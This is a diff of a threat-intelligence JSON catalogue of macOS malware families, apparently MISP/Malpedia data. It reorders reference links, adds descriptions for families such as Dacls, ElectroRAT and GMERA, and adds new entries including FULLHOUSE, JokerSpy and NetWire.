"https://objective-see.com/blog/blog_0x5F.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", - "https://objective-see.com/blog/blog_0x54.html", - "https://objective-see.com/blog/blog_0x49.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", - "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", - "https://securelist.com/operation-applejeus-sequel/95596/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment", "https://securelist.com/operation-applejeus/87553/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", + "https://objective-see.com/blog/blog_0x49.html", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://securelist.com/operation-applejeus-sequel/95596/", + "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", + "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/", + "https://www.youtube.com/watch?v=1NkzTKkEM2k", + "https://objective-see.com/blog/blog_0x54.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.youtube.com/watch?v=rjA0Vf75cYk" + "https://www.youtube.com/watch?v=rjA0Vf75cYk", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://objective-see.com/blog/blog_0x5F.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b" ], "synonyms": [], "type": [] @@ -8692,8 +9071,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", - "https://github.com/kai5263499/Bella", "https://threatintel.blog/OPBlueRaven-Part2/", + "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], "synonyms": [], @@ -8707,10 +9086,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore", - "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", - "https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20", "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html", + "https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20", "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c", + "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ @@ -8755,8 +9134,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds", - "https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/", "https://objective-see.com/blog/blog_0x69.html", + "https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/", "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/" ], "synonyms": [ @@ -8772,11 +9151,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.choziosi", - "https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension", - "https://www.th3protocol.com/2022/Choziosi-Loader", - "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension", "https://redcanary.com/blog/chromeloader/", - "https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/" + "https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/", + "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension", + "https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension", + "https://www.th3protocol.com/2022/Choziosi-Loader" ], "synonyms": [ "ChromeLoader", @@ -8792,8 +9171,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cloud_mensis", - "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/", - "https://twitter.com/ESETresearch/status/1575103839115804672" + "https://twitter.com/ESETresearch/status/1575103839115804672", + "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/" ], "synonyms": [], "type": [] @@ -8802,12 +9181,12 @@ "value": "CloudMensis" }, { - "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn’t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim’s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim’s hard drive to a remote server\r\n- update itself to a newer version", + "description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/" + "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/", + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [], "type": [] @@ -8876,8 +9255,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", - "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", - "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html" ], "synonyms": [], "type": [] @@ -8899,21 +9278,21 @@ "value": "Crossrider" }, { - "description": "", + "description": "According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.\r\n\r\nResearch shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls", - "https://objective-see.com/blog/blog_0x57.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://objective-see.com/blog/blog_0x5F.html", + "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://objective-see.com/blog/blog_0x57.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability", "https://www.sygnia.co/mata-framework", - "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/", - "https://objective-see.com/blog/blog_0x5F.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/" ], "synonyms": [], "type": [] @@ -8976,7 +9355,7 @@ "value": "Dummy" }, { - "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim’s webcam\r\n- Sending emails with an attachment", + "description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", @@ -8989,12 +9368,12 @@ "value": "Eleanor" }, { - "description": "", + "description": "According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, MacOS, and Linux users. Cyber criminals behind ElectroRAT target mainly cryptocurrency users. This RAT is distributed via the trojanized Jamm, eTrader, and DaoPoker applications.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat", - "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://objective-see.com/blog/blog_0x61.html", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf" ], "synonyms": [], @@ -9022,16 +9401,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest", + "https://objective-see.com/blog/blog_0x59.html", + "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/", + "https://objective-see.com/blog/blog_0x5F.html", + "https://github.com/gdbinit/evilquest_deobfuscator", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/", "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", "https://twitter.com/dineshdina04/status/1277668001538433025", "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/", - "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/", - "https://objective-see.com/blog/blog_0x59.html", - "https://github.com/gdbinit/evilquest_deobfuscator", - "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/", - "https://objective-see.com/blog/blog_0x5F.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/" + "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/" ], "synonyms": [ "ThiefQuest" @@ -9059,12 +9438,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher", - "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", - "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/", + "https://objective-see.com/blog/blog_0x5F.html", + "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://objective-see.com/blog/blog_0x4F.html", "https://securelist.com/finspy-unseen-findings/104322/", - "https://objective-see.com/blog/blog_0x5F.html" + "https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/" ], "synonyms": [], "type": [] @@ -9077,11 +9456,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", - "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html", "https://en.wikipedia.org/wiki/Flashback_(Trojan)", - "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html" + "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", + "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", + "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities", + "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], "synonyms": [ "FakeFlash" @@ -9096,12 +9475,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", - "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf", - "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", + "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", - "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", - "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", + "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", + "https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf" ], "synonyms": [ "Quimitchin" @@ -9111,28 +9490,41 @@ "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, + { + "description": "Fullhouse (AKA FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. Fullhouse is written in C/C++ and includes the capabilities of a tunneler and backdoor commands support such as shell command execution, file transfer, file managment, and process injection. C2 communications occur via HTTP and require configuration through the command line or a configuration file.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fullhouse", + "https://www.mandiant.com/resources/blog/north-korea-supply-chain" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2ab781d8-214d-41e2-acc9-23ded4f77663", + "value": "FULLHOUSE" + }, { "description": "This multi-platform malware is a ObjectiveC written macOS variant dubbed GIMMICK by Volexity. This malware is a file-based C2 implant used by Storm Cloud.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gimmick", - "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/", - "https://cybersecuritynews.com/gimmick-malware-attacks/" + "https://cybersecuritynews.com/gimmick-malware-attacks/", + "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/" ], "synonyms": [], "type": [] }, "uuid": "0e259d0f-717a-4ced-ac58-6fe9d72e2c96", - "value": "GIMMICK" + "value": "GIMMICK (OS X)" }, { - "description": "", + "description": "According to PCrisk, GMERA (also known as Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app created for Mac users.\r\n\r\nResearch shows that there are two variants of this malware, one detected as Trojan.MacOS.GMERA.A and the other as Trojan.MacOS.GMERA.B. Cyber criminals proliferate GMERA to steal various information and upload it to a website under their control. To avoid damage caused by this malware, remove GMERA immediately.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera", + "https://objective-see.com/blog/blog_0x53.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/", - "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/", - "https://objective-see.com/blog/blog_0x53.html" + "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/" ], "synonyms": [ "Kassi", @@ -9144,7 +9536,7 @@ "value": "Gmera" }, { - "description": "", + "description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named L\u00ea Thu H\u00e0 (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", @@ -9178,7 +9570,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.interception", - "https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/" + "https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto", + "https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/", + "https://twitter.com/ESETresearch/status/1559553324998955010" ], "synonyms": [], "type": [] @@ -9191,18 +9585,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab", - "https://www.malwarology.com/posts/5-janicab-part_1/", - "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/", - "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/", - "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/", "https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/", - "https://archive.f-secure.com/weblog/archives/00002576.html", - "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html", - "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/", "https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/", + "https://archive.f-secure.com/weblog/archives/00002576.html", + "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/", "https://www.macmark.de/blog/osx_blog_2013-08-a.php", - "https://securelist.com/deathstalker-mercenary-triumvirate/98177/" + "https://securelist.com/deathstalker-mercenary-triumvirate/98177/", + "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/", + "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/", + "https://www.malwarology.com/posts/5-janicab-part_1/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/", + "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html" ], "synonyms": [], "type": [] @@ -9210,13 +9604,26 @@ "uuid": "01325d85-297f-40d5-b829-df9bd996af5a", "value": "Janicab (OS X)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.jokerspy", + "https://www.elastic.co/security-labs/inital-research-of-jokerspy" + ], + "synonyms": [], + "type": [] + }, + "uuid": "171b0695-8cea-4ca6-a3f0-c9a8455ef9de", + "value": "JokerSpy" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", - "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", "https://objective-see.com/blog/blog_0x16.html", + "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" ], "synonyms": [], @@ -9230,10 +9637,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", + "https://objective-see.com/blog/blog_0x16.html", "https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap", - "https://objective-see.com/blog/blog_0x16.html" + "https://github.com/eset/malware-ioc/tree/master/keydnap" ], "synonyms": [], "type": [] @@ -9261,11 +9668,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "https://objective-see.com/blog/blog_0x16.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" + "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" ], "synonyms": [ "JHUHUGIT", @@ -9324,8 +9731,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", - "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", - "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" + "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", + "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" ], "synonyms": [], "type": [] @@ -9339,7 +9746,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.lockbit", "https://twitter.com/malwrhunterteam/status/1647384505550876675", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/" ], "synonyms": [], "type": [] @@ -9379,8 +9788,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", - "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", - "https://objective-see.com/blog/blog_0x1E.html" + "https://objective-see.com/blog/blog_0x1E.html", + "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" ], "synonyms": [], "type": [] @@ -9432,10 +9841,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.anquanke.com/post/id/223817", + "https://twitter.com/BitsOfBinary/status/1337330286787518464", "https://twitter.com/BitsOfBinary/status/1321488299932983296", - "https://twitter.com/BitsOfBinary/status/1337330286787518464" + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.anquanke.com/post/id/223817" ], "synonyms": [], "type": [] @@ -9471,22 +9880,35 @@ "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", "value": "Mughthesec" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.netwire", + "https://www.intego.com/mac-security-blog/fbi-shuts-down-11-year-old-netwire-rat-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f0d52afd-e7c9-4bd1-be8a-9ab09b14ea24", + "value": "NetWire" + }, { "description": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", - "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", - "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", - "https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/", - "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", - "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/", 